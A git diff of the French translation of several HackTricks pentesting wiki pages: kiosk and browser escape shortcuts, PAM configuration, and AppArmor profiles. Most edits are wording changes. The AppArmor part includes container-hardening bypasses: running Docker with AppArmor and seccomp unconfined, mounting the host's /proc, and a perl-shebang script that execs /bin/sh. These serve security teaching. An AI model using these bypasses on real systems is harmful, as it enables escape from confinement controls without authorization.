@ -63,11 +63,11 @@ _bash, sh, zsh..._ Plus ici : [https://gtfobins.github.io/](https://gtfobins.git
* **Variables d'environnement** : Il y a beaucoup de variables d'environnement qui pointent vers un chemin
* **Autres protocoles** : _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **Liens symboliques**
* **Raccourcis** : CTRL+N (ouvrir une nouvelle session), CTRL+R (Exécuter des commandes), CTRL+SHIFT+ESC (Gestionnaire des tâches), Windows+E (ouvrir l'explorateur), CTRL-B, CTRL-I (Favoris), CTRL-H (Historique), CTRL-L, CTRL-O (Fichier/Ouvrir la boîte de dialogue), CTRL-P (Boîte de dialogue d'impression), CTRL-S (Enregistrer sous)
* **Raccourcis** : CTRL+N (ouvrir une nouvelle session), CTRL+R (Exécuter des commandes), CTRL+SHIFT+ESC (Gestionnaire des tâches), Windows+E (ouvrir l'explorateur), CTRL-B, CTRL-I (Favoris), CTRL-H (Historique), CTRL-L, CTRL-O (Fichier/Ouvrir la boîte de dialogue), CTRL-P (Boîte de dialogue d'impression), CTRL-S (Enregistrer sous)
* Menu administratif caché : CTRL-ALT-F8, CTRL-ESC-F9
* **URI Shell** : _shell:Outils administratifs, shell:Bibliothèques de documents, shell:Bibliothèques, shell:Profils d'utilisateurs, shell:Personnel, shell:Dossier de recherche, shell:Système, shell:Réseau, shell:Envoyer vers, shell:Profils d'utilisateurs, shell:Outils administratifs communs, shell:Ordinateur, shell:Internet_
* **URI Shell** : _shell:Outils administratifs, shell:Bibliothèques de documents, shell:Bibliothèques, shell:Profils d'utilisateurs, shell:Personnel, shell:Dossier de recherche, shell:Système, shell:Réseau, shell:Envoyer à, shell:Profils d'utilisateurs, shell:Outils administratifs communs, shell:Poste de travail, shell:Internet_
* **Chemins UNC** : Chemins pour se connecter à des dossiers partagés. Vous devriez essayer de vous connecter au C$ de la machine locale ("\\\127.0.0.1\c$\Windows\System32")
* **Autres chemins UNC** :
* **Autres chemins UNC :**
| UNC | UNC | UNC |
| ------------------------- | -------------- | -------------------- |
@ -101,10 +101,10 @@ Explorateur : [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2
## Raccourcis
* Touches collantes Appuyez sur SHIFT 5 fois
* Touches de souris SHIFT+ALT+NUMLOCK
* Sticky Keys Appuyez sur SHIFT 5 fois
* Mouse Keys SHIFT+ALT+NUMLOCK
* Contraste élevé SHIFT+ALT+PRINTSCN
* Touches de basculement Maintenez NUMLOCK enfoncé pendant 5 secondes
* Touche de bascule Maintenez NUMLOCK enfoncé pendant 5 secondes
* Touches de filtre Maintenez la touche droite SHIFT enfoncée pendant 12 secondes
* WINDOWS+F1 Recherche Windows
* WINDOWS+D Afficher le bureau
@ -141,7 +141,7 @@ C'est une barre d'outils qui apparaît en haut à gauche de l'image lorsqu'elle
Tapez ces URL pour obtenir une vue de l'Explorateur :
* `shell:Outils d'administration`
* `shell:Bibliothèques de documents`
* `shell:Bibliothèque de documents`
* `shell:Bibliothèques`
* `shell:ProfilsUtilisateurs`
* `shell:Personnel`
@ -182,7 +182,7 @@ Source : https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de1981
* Balayez vers le haut avec quatre (ou cinq) doigts / Double-tapez sur le bouton Accueil : Pour afficher la vue multitâche et changer d'application
* Balayez d'un côté ou de l'autre avec quatre ou cinq doigts : Pour passer à l'application suivante/précédente
* Balayez d'un côté ou de l'autre avec quatre ou cinq doigts : Pour changer vers l'application suivante/précédente
* Pincez l'écran avec cinq doigts / Touchez le bouton Accueil / Balayez vers le haut avec 1 doigt depuis le bas de l'écran en un mouvement rapide vers le haut : Pour accéder à l'Accueil
@ -194,7 +194,7 @@ Source : https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de1981
* Balayez avec 1 doigt depuis la gauche de l'écran sur 1-2 pouces : Pour voir la vue Aujourd'hui
* Balayez rapidement avec 1 doigt du centre de l'écran vers la droite ou la gauche : Pour passer à l'application suivante/précédente
* Balayez rapidement avec 1 doigt depuis le centre de l'écran vers la droite ou la gauche : Pour changer vers l'application suivante/précédente
* Maintenez enfoncé le bouton Marche/Arrêt en haut à droite de l'iPad + Déplacez le curseur Éteindre tout à droite : Pour éteindre
@ -243,9 +243,9 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut
| ⌘⇧H (Commande-Majuscule-H) | Aller à l'Accueil |
| ⌘ (Espace) | Ouvrir Spotlight |
| ⌘⇥ (Commande-Tabulation) | Liste des dix dernières applications utilisées |
| ⌘\~ | Aller à la dernière application |
| ⌘\~ | Aller à la dernière application |
| ⌘⇧3 (Commande-Majuscule-3) | Capture d'écran (apparaît en bas à gauche pour enregistrer ou agir dessus) |
| ⌘⇧4 | Capture d'écran et l'ouvrir dans l'éditeur |
| ⌘⇧4 | Capture d'écran et l'ouvrir dans l'éditeur |
| Maintenir enfoncé ⌘ | Liste des raccourcis disponibles pour l'application |
| ⌘⌥D (Commande-Option/Alt-D) | Faire apparaître le dock |
| ^⌥H (Contrôle-Option-H) | Bouton Accueil |
@ -254,7 +254,7 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut
| Échap | Bouton Retour |
| → (Flèche droite) | Élément suivant |
| ← (Flèche gauche) | Élément précédent |
| ↑↓ (Flèche vers le haut, Flèche vers le bas) | Appuyer simultanément sur l'élément sélectionné |
| ↑↓ (Flèche vers le haut, flèche vers le bas) | Appuyer simultanément sur l'élément sélectionné |
| ⌥ ↓ (Option-Flèche vers le bas) | Faire défiler vers le bas |
| ⌥↑ (Option-Flèche vers le haut) | Faire défiler vers le haut |
| ⌥← ou ⌥→ (Option-Flèche gauche ou Option-Flèche droite) | Faire défiler vers la gauche ou la droite |
@ -266,29 +266,29 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut
| Raccourci | Action |
| ----------------------- | ------------------------------------------------ |
| ⌘L (Commande-L) | Ouvrir l'emplacement |
| ⌘L (Command-L) | Ouvrir l'emplacement |
| ⌘T | Ouvrir un nouvel onglet |
| ⌘W | Fermer l'onglet actuel |
| ⌘W | Fermer l'onglet actuel |
| ⌘R | Actualiser l'onglet actuel |
| ⌘. | Arrêter le chargement de l'onglet actuel |
| ^⇥ | Passer à l'onglet suivant |
| ^⇧⇥ (Contrôle-Shift-Tab) | Aller à l'onglet précédent |
| ^⇧⇥ (Control-Shift-Tab) | Aller à l'onglet précédent |
| ⌘L | Sélectionner le champ de texte/URL pour le modifier|
| ⌘⇧T (Commande-Shift-T) | Ouvrir le dernier onglet fermé (peut être utilisé plusieurs fois) |
| ⌘⇧T (Command-Shift-T) | Ouvrir le dernier onglet fermé (peut être utilisé plusieurs fois) |
| ⌘\[ | Revenir en arrière dans l'historique de navigation |
| ⌘] | Aller en avant dans l'historique de navigation |
| ⌘⇧R | Activer le mode Lecteur |
| ⌘] | Aller en avant dans l'historique de navigation |
| ⌘⇧R | Activer le mode Lecteur |
### Raccourcis Mail
| Raccourci | Action |
| -------------------------- | ---------------------------- |
| ⌘L | Ouvrir l'emplacement |
| ⌘T | Ouvrir un nouvel onglet |
| ⌘T | Ouvrir un nouvel onglet |
| ⌘W | Fermer l'onglet actuel |
| ⌘R | Actualiser l'onglet actuel |
| ⌘. | Arrêter le chargement de l'onglet actuel |
| ⌘⌥F (Commande-Option/Alt-F) | Rechercher dans votre boîte de réception |
| ⌘⌥F (Command-Option/Alt-F) | Rechercher dans votre boîte de réception |
# Références
@ -298,15 +298,15 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site Web et essayer leur moteur gratuitement sur :
{% embed url="https://whiteintel.io" %}
@ -319,7 +319,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -4,7 +4,7 @@
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
@ -12,9 +12,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -35,7 +35,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
- Les **systèmes Solaris et UNIX** utilisent généralement un fichier de configuration central situé à `/etc/pam.conf`.
- Les **systèmes Linux** préfèrent une approche basée sur les répertoires, stockant les configurations spécifiques aux services dans `/etc/pam.d`. Par exemple, le fichier de configuration pour le service de connexion se trouve à `/etc/pam.d/login`.
Un exemple de configuration PAM pour le service de connexion pourrait ressembler à ceci:
Un exemple de configuration PAM pour le service de connexion pourrait ressembler à ceci :
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -59,24 +59,24 @@ Ces royaumes, ou groupes de gestion, comprennent **auth**, **account**, **passwo
### **Contrôles des modules PAM**
Les contrôles dictent la réponse du module en cas de succès ou d'échec, influençant le processus d'authentification global. Ceux-ci incluent :
Les contrôles dictent la réponse du module en cas de succès ou d'échec, influençant le processus d'authentification global. Ils comprennent :
- **Requis** : L'échec d'un module requis entraîne éventuellement un échec, mais seulement après que tous les modules ultérieurs ont été vérifiés.
- **Requis** : L'échec d'un module requis entraîne éventuellement un échec, mais seulement après vérification de tous les modules suivants.
- **Requis** : Arrêt immédiat du processus en cas d'échec.
- **Suffisant** : Le succès contourne le reste des vérifications du même royaume à moins qu'un module ultérieur ne échoue.
- **Optionnel** : Ne provoque un échec que s'il est le seul module dans la pile.
### Exemple de scénario
### Scénario d'exemple
Dans une configuration avec plusieurs modules d'authentification, le processus suit un ordre strict. Si le module `pam_securetty` trouve le terminal de connexion non autorisé, les connexions root sont bloquées, mais tous les modules sont toujours traités en raison de son statut "requis". Le module `pam_env` définit des variables d'environnement, aidant potentiellement à l'expérience utilisateur. Les modules `pam_ldap` et `pam_unix` travaillent ensemble pour authentifier l'utilisateur, `pam_unix` tentant d'utiliser un mot de passe précédemment fourni, améliorant l'efficacité et la flexibilité des méthodes d'authentification.
Dans une configuration avec plusieurs modules d'authentification, le processus suit un ordre strict. Si le module `pam_securetty` trouve le terminal de connexion non autorisé, les connexions root sont bloquées, mais tous les modules sont toujours traités en raison de son statut "requis". Le module `pam_env` définit des variables d'environnement, aidant potentiellement à l'expérience utilisateur. Les modules `pam_ldap` et `pam_unix` travaillent ensemble pour authentifier l'utilisateur, `pam_unix` tentant d'utiliser un mot de passe précédemment fourni, améliorant ainsi l'efficacité et la flexibilité des méthodes d'authentification.
## Références
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -96,7 +96,7 @@ Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -4,23 +4,23 @@
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -30,12 +30,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Informations de base
AppArmor est une **amélioration du noyau conçue pour restreindre les ressources disponibles aux programmes via des profils par programme**, mettant en œuvre efficacement un contrôle d'accès obligatoire (MAC) en liant directement les attributs de contrôle d'accès aux programmes plutôt qu'aux utilisateurs. Ce système fonctionne en **chargeant des profils dans le noyau**, généralement au démarrage, et ces profils dictent les ressources auxquelles un programme peut accéder, telles que les connexions réseau, l'accès aux sockets bruts et les autorisations de fichier.
AppArmor est une **amélioration du noyau conçue pour restreindre les ressources disponibles aux programmes via des profils par programme**, mettant en œuvre efficacement un contrôle d'accès obligatoire (MAC) en liant directement les attributs de contrôle d'accès aux programmes au lieu des utilisateurs. Ce système fonctionne en **chargeant des profils dans le noyau**, généralement au démarrage, et ces profils dictent les ressources auxquelles un programme peut accéder, telles que les connexions réseau, l'accès aux sockets bruts et les autorisations de fichier.
Il existe deux modes opérationnels pour les profils AppArmor :
- **Mode d'application des règles** : Ce mode applique activement les politiques définies dans le profil, bloquant les actions qui violent ces politiques et journalisant toute tentative de les violer via des systèmes tels que syslog ou auditd.
- **Mode de plainte** : Contrairement au mode d'application des règles, le mode de plainte ne bloque pas les actions contraires aux politiques du profil. Au lieu de cela, il journalise ces tentatives en tant que violations de la politique sans imposer de restrictions.
- **Mode d'application des règles** : Ce mode applique activement les politiques définies dans le profil, bloquant les actions qui violent ces politiques et journalisant toute tentative de les violer à travers des systèmes comme syslog ou auditd.
- **Mode de plainte** : Contrairement au mode d'application des règles, le mode de plainte ne bloque pas les actions contraires aux politiques du profil. Au lieu de cela, il journalise ces tentatives en tant que violations de politique sans imposer de restrictions.
### Composants d'AppArmor
@ -47,9 +47,9 @@ Il existe deux modes opérationnels pour les profils AppArmor :
### Chemin des profils
Les profils AppArmor sont généralement enregistrés dans _**/etc/apparmor.d/**_\
Avec `sudo aa-status`, vous pourrez lister les binaires restreints par un profil. Si vous remplacez le caractère "/" par un point du chemin de chaque binaire répertorié, vous obtiendrez le nom du profil AppArmor à l'intérieur du dossier mentionné.
Avec `sudo aa-status`, vous pourrez lister les binaires restreints par un profil. Si vous remplacez le caractère "/" par un point du chemin de chaque binaire répertorié, vous obtiendrez le nom du profil apparmor à l'intérieur du dossier mentionné.
Par exemple, un profil **AppArmor** pour _/usr/bin/man_ sera situé dans _/etc/apparmor.d/usr.bin.man_
Par exemple, un profil **apparmor** pour _/usr/bin/man_ sera situé dans _/etc/apparmor.d/usr.bin.man_
### Commandes
```bash
@ -63,7 +63,7 @@ aa-mergeprof #used to merge the policies
```
## Création d'un profil
* Afin d'indiquer l'exécutable concerné, les **chemins absolus et les caractères génériques** sont autorisés (pour le globbing de fichiers) pour spécifier les fichiers.
* Pour indiquer l'exécutable affecté, les **chemins absolus et les caractères génériques** sont autorisés (pour le globbing de fichiers) pour spécifier les fichiers.
* Pour indiquer l'accès que le binaire aura aux **fichiers**, les **contrôles d'accès** suivants peuvent être utilisés :
* **r** (lecture)
* **w** (écriture)
@ -74,7 +74,7 @@ aa-mergeprof #used to merge the policies
* **Px** (exécuter sous un autre profil, après avoir nettoyé l'environnement)
* **Cx** (exécuter sous un profil enfant, après avoir nettoyé l'environnement)
* **Ux** (exécuter sans confinement, après avoir nettoyé l'environnement)
* **Des variables** peuvent être définies dans les profils et peuvent être manipulées depuis l'extérieur du profil. Par exemple : @{PROC} et @{HOME} (ajoutez #include \<tunables/global> au fichier de profil)
* Des **variables** peuvent être définies dans les profils et peuvent être manipulées depuis l'extérieur du profil. Par exemple : @{PROC} et @{HOME} (ajoutez #include \<tunables/global> au fichier de profil)
* Les **règles de refus** sont prises en charge pour remplacer les règles d'autorisation.
### aa-genprof
@ -96,7 +96,7 @@ En utilisant les touches fléchées, vous pouvez sélectionner ce que vous voule
### aa-easyprof
Vous pouvez également créer un modèle de profil apparmor d'un binaire avec:
Vous pouvez également créer un modèle de profil apparmor d'un binaire avec :
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -122,7 +122,7 @@ sudo aa-easyprof /path/to/binary
}
```
{% hint style="info" %}
Notez que par défaut, dans un profil créé, rien n'est autorisé, donc tout est refusé. Vous devrez ajouter des lignes comme `/etc/passwd r,` pour autoriser la lecture binaire de `/etc/passwd`, par exemple.
Notez qu'en créant un profil, par défaut, rien n'est autorisé, donc tout est refusé. Vous devrez ajouter des lignes comme `/etc/passwd r,` pour autoriser la lecture binaire de `/etc/passwd`, par exemple.
{% endhint %}
Vous pouvez ensuite **appliquer** le nouveau profil avec
@ -149,7 +149,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
## Journaux
Exemple de journaux **AUDIT** et **DENIED** du fichier _/var/log/audit/audit.log_ de l'exécutable **`service_bin`**:
Exemple de journaux **AUDIT** et **DENIED** provenant de _/var/log/audit/audit.log_ de l'exécutable **`service_bin`**:
```bash
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
@ -195,7 +195,7 @@ Par défaut, le profil **Apparmor docker-default** est généré à partir de [h
**Résumé du profil docker-default**:
- **Accès** à tout le **réseau**
- Aucune **capacité** n'est définie (Cependant, certaines capacités proviendront de l'inclusion des règles de base de base, c'est-à-dire #include \<abstractions/base>)
- Aucune **capacité** n'est définie (Cependant, certaines capacités proviendront de l'inclusion de règles de base de base, c'est-à-dire #include \<abstractions/base>)
- **Écriture** dans n'importe quel fichier **/proc** n'est **pas autorisée**
- Les autres **sous-répertoires**/**fichiers** de /**proc** et /**sys** se voient **refuser** l'accès en lecture/écriture/blocage/liens/exécution
- Le **montage** n'est **pas autorisé**
@ -216,7 +216,7 @@ Vous devez **désactiver apparmor** pour contourner ses restrictions :
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
Notez que par défaut, **AppArmor** interdit également au conteneur de monter des dossiers de l'intérieur même avec la capacité SYS_ADMIN.
Notez que par défaut **AppArmor** interdit également au conteneur de monter des dossiers de l'intérieur même avec la capacité SYS\_ADMIN.
Notez que vous pouvez **ajouter/supprimer** des **capacités** au conteneur Docker (cela restera tout de même restreint par des méthodes de protection comme **AppArmor** et **Seccomp**):
@ -240,19 +240,19 @@ Pour activer le profil, nous devons faire ce qui suit :
```
sudo apparmor_parser -r -W mydocker
```
Pour répertorier les profils, nous pouvons exécuter la commande suivante. La commande ci-dessous répertorie mon nouveau profil AppArmor.
Pour lister les profils, nous pouvons exécuter la commande suivante. La commande ci-dessous liste mon nouveau profil AppArmor.
```
$ sudo apparmor_status | grep mydocker
mydocker
```
Comme indiqué ci-dessous, nous obtenons une erreur lors de la tentative de modification de "/etc/" car le profil AppArmor empêche l'accès en écriture à "/etc".
Comme indiqué ci-dessous, une erreur se produit lors de la tentative de modification de "/etc/" car le profil AppArmor empêche l'accès en écriture à "/etc".
```
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
chmod: /etc/hostname: Permission denied
```
### Contournement d'AppArmor Docker1
Vous pouvez trouver quel **profil apparmor exécute un conteneur** en utilisant:
Vous pouvez trouver quel **profil apparmor exécute un conteneur** en utilisant :
```bash
docker inspect 9d622d73a614 | grep lowpriv
"AppArmorProfile": "lowpriv",
@ -264,11 +264,15 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
```
### Contournement d'AppArmor Docker
**AppArmor est basé sur les chemins**, cela signifie que même s'il pourrait **protéger** les fichiers à l'intérieur d'un répertoire comme **`/proc`**, si vous pouvez **configurer comment le conteneur va être exécuté**, vous pourriez **monter** le répertoire proc de l'hôte à l'intérieur de **`/host/proc`** et il **ne sera plus protégé par AppArmor**.
**Dans le cas étrange où vous pouvez modifier le profil apparmor docker et le recharger.** Vous pourriez supprimer les restrictions et les "contourner".
### Contournement d'AppArmor Docker 2
**AppArmor est basé sur les chemins**, cela signifie que même s'il pourrait **protéger** les fichiers à l'intérieur d'un répertoire comme **`/proc`** si vous pouvez **configurer comment le conteneur va être exécuté**, vous pourriez **monter** le répertoire proc de l'hôte à l'intérieur de **`/host/proc`** et il **ne sera plus protégé par AppArmor**.
### Contournement de Shebang AppArmor
Dans [**ce bug**](https://bugs.launchpad.net/apparmor/+bug/1911431), vous pouvez voir un exemple de comment **même si vous empêchez perl d'être exécuté avec certaines ressources**, si vous créez simplement un script shell **spécifiant** dans la première ligne **`#!/usr/bin/perl`** et que vous **exécutez le fichier directement**, vous pourrez exécuter ce que vous voulez. Par exemple:
Dans [**ce bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) vous pouvez voir un exemple de comment **même si vous empêchez perl d'être exécuté avec certaines ressources**, si vous créez simplement un script shell **spécifiant** dans la première ligne **`#!/usr/bin/perl`** et que vous **exécutez le fichier directement**, vous pourrez exécuter ce que vous voulez. Par exemple:
```perl
echo '#!/usr/bin/perl
use POSIX qw(strftime);
@ -278,13 +282,13 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Leur objectif principal est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -296,10 +300,10 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
